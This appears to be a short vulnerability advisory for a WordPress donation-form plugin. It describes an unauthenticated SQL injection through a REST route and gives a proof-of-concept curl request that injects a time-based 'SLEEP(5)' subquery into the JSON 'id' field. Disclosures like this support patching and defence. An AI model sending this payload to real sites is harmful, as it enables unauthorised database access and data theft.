The plugin does not sanitise and escape a parameter before using it in a SQL statement via one of it’s REST route, leading to an SQL injection exploitable by unauthenticated users
curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
--data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
-X GET \
-H 'Content-Type: application/json'